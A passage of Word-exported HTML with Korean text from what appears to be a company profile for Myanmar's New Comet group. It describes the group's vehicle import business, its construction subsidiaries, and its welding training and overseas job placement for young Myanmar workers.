style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span 